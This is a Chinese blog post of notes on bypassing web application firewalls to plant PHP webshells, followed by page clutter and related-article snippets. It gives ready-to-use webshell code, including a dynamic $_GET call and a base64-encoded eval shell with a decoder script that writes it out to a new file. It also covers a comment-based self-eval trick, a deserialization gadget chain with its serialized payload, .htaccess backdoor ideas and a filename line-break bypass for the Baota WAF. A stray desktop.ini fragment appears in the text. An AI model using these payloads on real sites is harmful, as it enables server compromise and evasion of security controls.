waf绕过方法闲人

最新推荐文章于 2024-08-19 07:00:00 发布
最新推荐文章于 2024-08-19 07:00:00 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45781155/article/details/109118613
版权
本文介绍了多种绕过Web应用防火墙(WAF)的策略,包括动态调用PHP代码、利用.htaccess文件、文件篡改、低危木马利用以及逻辑漏洞利用。通过换行、编码、文件操作等技巧,黑客可以避开WAF的检测,实现恶意代码的执行。同时,文章提到了宝塔WAF的换行绕过方法。
摘要由CSDN通过智能技术生成

一:动态调用
waf会对文件内容进行检索,如果发现有什么危险的函数,或者有什么危害的逻辑,都会进行拦击,所以我们不能写入一些危险的函数,否则就会被ban掉。在我们真正恶意代码前加入大量杂糅字符进行绕过;然后对后缀进行换行绕过;

��
[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21770
IconResource=%SystemRoot%\system32\imageres.dll,-112
IconFile=%SystemRoot%\system32\shell32.dll
IconIndex=-235

写入<?php $_GET['0']($_GET['1']);?>我们在上传的文件中并没有出现什么危险的函数,而是通过后期的get传入进行动态调用从而执行命令;这样就会绕过上传时waf的检测;但是绕不过disable_function;

二:利用.htaccess文件
对于利用.htaccess文件的攻击方法,其实有很多方法;包括自我包含造成后门,或者auto_prepend_file文件,或者自定义报错目录然后利用包含报错写入木马最后自定义包含,AddType等等。我们只需要将木马文件进行相应的编码即可;这种方法可以绕过waf的检测,但是也是绕不过 disable_function;

三:利用文件修改文件造成木马
当我们无法上传带有危险函数的木马时;可以使用文件篡改文件的方法;

先传入PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7Pz4=(<?php eval($_POST['a']);?>的base64)命名为1.php;这里我们上传时waf自然不会检测到,因为我们确实没有危险函数;然后再次传入第二个没有高度危险函数的2.php代码:

<?php 

$path ="/xx/xxx/xx/1.php";//读取文件1.php

$str= file_get_contents($path);

$strs = base64_decode($str);//进行base64解码

$s1mple = fopen("./s1mple.php","w");

fwrite($s1mple,$strs);
fclose($s1mple);
?>

将我们的文件,进行了base64解密,然后写入的一个新的php文件中。先访问2.php,然后再访问s1mple.php就可以拿到shell。

fopen() 函数:打开文件或者 URL,如果打开失败,本函数返回 FALSE。

fopen(filename,mode,include_path,context)

filename:必需。规定要打开的文件或 URL。
mode:必需。规定要求到该文件/流的访问类型。可能的值见下表。
include_path:可选。如果也需要在 include_path 中检索文件的话,可以将该参数设为 1 或 TRUE。
context:可选。规定文件句柄的环境。Context 是可以修改流的行为的一套选项。

“r” :只读方式打开,将文件指针指向文件头。
“r+” :读写方式打开,将文件指针指向文件头。
“w” :写入方式打开,将文件指针指向文件头并将文件大小截为零。如果文件不存在则尝试创建之。
“w+” :读写方式打开,将文件指针指向文件头并将文件大小截为零。如果文件不存在则尝试创建之。
“a” :写入方式打开,将文件指针指向文件末尾。如果文件不存在则尝试创建之。
“a+” :读写方式打开,将文件指针指向文件末尾。如果文件不存在则尝试创建之。

四:利用低危木马;
如果不是拿权限的话,也是可以利用一些低危的操作,比如任意文件读取等等;

<?php
$s1mple = file_get_contents(__FILE__);//获取代码的所有内容;
eval(str_replace("<?php","",str_replace("//","",$s1mple)));//释放出木马
//eval($_GET['a']);
?>

基于注释的绕过。得到eval($_GET[‘a’]);可以达到任意文件读取。

五:利用逻辑问题
这个看不懂:

<?php
error_reporting(0);
class s1mple{
  public $A;
  function __construct(){
    $this->A=new hacker();
  }
  function __destruct(){
    $this->A->action();
  }
}
class hacker{
  function action(){
    echo "hello_hacker";
  }
}
class evil{
  public $data;
  function action(){
    eval($this->data);
  }
}
unserialize($_GET['a']);

解析完这样:

O:6:"s1mple":1:{s:1:"A";O:4:"evil":1:{s:4:"data";s:10:"phpinfo();";}}

六:利用过宝塔waf思路另辟蹊径绕过waf
宝塔的waf对于文件明后缀的检测,是可以通过换行进行绕过的;对我们的filename做手脚;对filename做换行,也可以绕过;

闲人end
关注
专栏目录
WAF是如何被绕过的?
hackzkaq的博客
11-19 925
作者:掌控安全学员-暗箭 欢迎关注公众号:掌控安全EDU 不知不觉来到掌控学院也快两个月了,想起俩个月前,从零开始,一步一个脚印的走到现在。 虽然有时很疲惫,但是却很快乐。 在下才疏学浅,仅在这里发表一下不成熟的见解,希望对大家的提升有所帮助 首先我们要了解什么是waf: Web应用防火墙,Web Application Firewall的简称 我们口头相谈的waf有什么功能呢? WAF可以发现和拦截各类Web层面的攻击,记录攻击日志,实时预警提醒,在Web应 用本身存在缺陷的情况下保障其安全。 但是,.
WAF绕过思路
永远是少年
03-12 3646
WAF绕过思路 WAF在渗透测试中,是我们要面对的第一关卡,渗透测试人员对站点WAF绕过过程就是渗透测试人员与网站管理员(或WAF开发者)进行PK的过程。在对WAF的渗透时,一般可以考虑采用以下方式展开。 一、增加WAF负担 WAF是为网站安全服务的,但是WAF的存在如果干扰了网站的正常运行,则会得不偿失,因此,网站管理员一般会恰当的配置WAF,起到在不会干扰网站正常运行的前提下,对用户的输入进行过滤的作用。因此,有些WAF就会设置如果数据包长度过长,就对部分数据包或者是数据包的部分内容进行无检测“放行”
WAF绕过技巧
最新发布
Liu_Bruce的博客
08-19 499
WAF(Web Application Firewall)是一种安全系统,旨在监控和控制网络流量,以防止攻击,如SQL 注入、跨站脚本(XSS)和拒绝服务(DoS)。WAF 可以通过多种方式绕过
WAF绕过小技巧
tomyyyyy
09-22 6887
一、WAF绕过 1、脏数据绕过 即传入一段长数据使waf失效,从而实现绕过waf。某些waf处理POST的数据时,只会检测开头的8K,后面选择全部放过。 例如,当发现某网站存在一个反序列化漏洞时,但是无回显,被waf拦截了 利用脏数据插入5000个x字符,可以成功绕过。 2、高并发绕过 对请求进行并发,攻击请求会被负载均衡调度到不同节点,导致某些请求绕过waf的拦截 3、http参数污染...
WAF绕过方法
weixin_30590285的博客
07-19 566
1.大小写绕过 这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。 2.简单编码绕过 比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。 也还有大家在Mysql注...
fopen()用法
weixin_30555515的博客
03-05 185
filename 必需。规定要打开的文件或 URL。 mode 必需。规定要求到该文件/流的访问类型。可能的值见下表。 include_path 可选。如果也需要在 include_path 中检索文件的话,可以将该参数设为 1 或 TRUE。 context 可选。规定文件句柄的环境。Context 是可以修改流的行为的一套选项。 "r" 只读方式打开,将文件指针指向文件头。 "r+" 读写...
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
长亭waf绕过1.pdf
07-09
长亭waf绕过1
waf绕过方法总结
gugonggugong的博客
12-30 2959
一、WAF防护原理 1. bypass 客户端JavaScript校验;服务器校验;文件内容头字段、编码校验;后缀名黑名单校验;自定义正则校验;waf设备校验; 有些waf不会防asp/php/jsp后缀文件,但是他会检测里面的文件WTS-WAF bypass ; baidu colud bypass; aliyun waf; 安全狗上传bypass;云锁上传bypass; 2. defense ...
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
44-5 waf绕过 - SQL注入绕WAF方法
weixin_43263566的博客
06-04 158
内联注释是一种特殊的注释格式,在其后面紧跟着数据库版本号时,如果实际的数据库版本等于或高于该字符串,则应用程序会将注释内容解释为SQL语句,否则将其视为注释处理。默认情况下,如果没有指定版本号,内联注释中的内容将会执行。首先经过测试发现安全狗并不是直接过滤 and 关键字,而是过滤 adn + 一个表达式,如:and 1=1 这种才会被过滤。如果你要使用order by进行爆列,会发现也被过滤了,绕过:使用 group by 绕过。/ 之后的注释内容则会被真正地注释掉,失去作用。
常见的WAF绕过方法
热门推荐
武天旭的博客
02-11 1万+
本篇文章通过网络架构层、HTTP协议层、第三方应用层讲解了绕过WAF的常见方法 一、网络架构层 一般通过域名指向云WAF地址后反向实现代理,找到这些公司的服务器的真实IP即可实现绕过。 具体方法如下: 1、查找相关的二级域名及同一域名注册者的其他域名解析记录。 2、通过查看邮件MX解析记录来发现真实服务器的IP记录或网段,例如: windows可以执行命令: nslookup -qt=mx baidu.com Linux可以执行如下命令来查看baidu.com域名的MX解析...
WAF绕过
liwenqianye的博客
12-21 2309
WAF绕过 数据 1、大小写变换 如:对某些关键字如:select、union、order、where进行关键字的过滤,能够采用SelEct、UniOn等大小写变换进行绕过。 id=1UnIoN/**/SeLeCT1,user() 2、使用嵌套 如对某些关键字替换为空,能够采用嵌套双写进行绕过,如碰到select或者union等关键字时会将其替换为空,此时能够尝试SELEselectCT、UNIunionON进行绕过。 3、空字节 一些过滤器在碰到空字节会中止过滤,如id=1 %00 and 1=1或id=
WAF介绍及常见绕过方法
qq_41320827的博客
02-20 8859
一、WAF简介 WAF(WebApplicationFirewall)也称:网站应用级入侵防御系统,是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 1.工作原理 对web应用程序客户端发出的流量进行内容检测和验证,检测其安全性与合法性,来屏蔽常见的网站漏洞攻击,如SQL注入,XML注入、XSS等。 2.WAF分类 软件型WAF 以软件形式装在所保护的服务器...
WAF01】WAF简介及绕过方式
Fighting_hawk的博客
03-22 4190
1. 了解一下WAF的分类; 2. 了解如何建议网站是否配置WAF; 3. 了解WAF绕过方式。
fopen 用法
yzl_rex
10-20 613
fopen() 函数打开文件或者 URL。如果打开失败,本函数返回 FALSE,在php中我们还可利用fopen来创建文件,只要带w+,w等参数。 语法:fopen(filename,mode,include_path,context) 参数 描述 filename 必需。规定要打开的文件或 URL。 mode 必需。规定要求到该文件/流的访问类型。可能的值见下表。 include
WAF绕过讲解
weixin_55837124的博客
06-18 653
WAF绕过 WAF 在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。网站存在WAF,意味着我们不能使用安全工具对网站进行测试,因为一旦触碰了WAF的规则,轻则丢弃报文,重则拉黑IP。所以,我们需要手动进行WAF绕过,而绕过WAF前肯定需要对WAF 的工作原理有一定的理解。 首先,WAF分为非嵌入型WAF和嵌入型WAF,非嵌入型WAF指的是硬件型WAF、云WAF、软件型WAF之类的;而嵌入型WAF指的是网站内置的WAF。非嵌入型WAF对Web流量的解析完全是靠自身的,而嵌入型WAF拿到的Web数据是
练习:FILE*file指针;fopen的用法
weixin_30575309的博客
01-24 1596
#include<stdio.h>int main(void){FILE*file;file = fopen("C:\\test","r"); if(!file){ //等效于:file ==NULLprintf("打开文件成功!");}else{printf("打开文件失败!");}return 0;} 打开方式: 转载于:https:/...
PHP fopen()函数 打开文件
weixin_30530939的博客
01-01 296
fopen()函数的用法: 对文件进行数据存取的第一步操作就是要打开文件。在PHP中使用fopen()函数打开文件,fopen()函数的语法为: fopen(filename,mode,include_path,context); filename:必选。打开包含路径的文件名,路径可是相对路径,也可是绝对路径。无前缀则表示打开的是本地文件。 mode:必选。打开文件的方式(文件/流的...
破解WAF:探索多种绕过方法策略
本文档主要探讨了如何在网络安全中绕过Web应用防火墙(WAF)的几种方法。作者于2011年9月6日撰写,分享了一些技术细节和示例,旨在帮助读者理解和应对WAF的防护机制。 1. **理解WAF**: WAF是一种网络安全设备或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值